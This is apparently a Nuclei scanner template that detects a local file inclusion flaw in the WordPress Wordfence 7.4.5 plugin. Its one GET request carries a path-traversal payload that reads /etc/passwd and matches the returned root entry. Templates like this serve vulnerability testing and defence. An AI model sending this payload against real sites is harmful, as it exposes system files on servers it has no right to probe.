id: wordpress-wordfence-lfi

info:
  name: WordPress Wordfence 7.4.5 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Wordfence 7.4.5 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48061
    - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,lfi,wordfence,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100ed3b912e7baee44cb3af6c1d1933cde616626f935d42ec8caf9b5598ae32d00e0221008e5ed2f2590e7c8c7a94861cf70ebd7e516ecd04f36985c83867c3fe1cdb4a45:922c64590222798bb761d5b6d8e72950
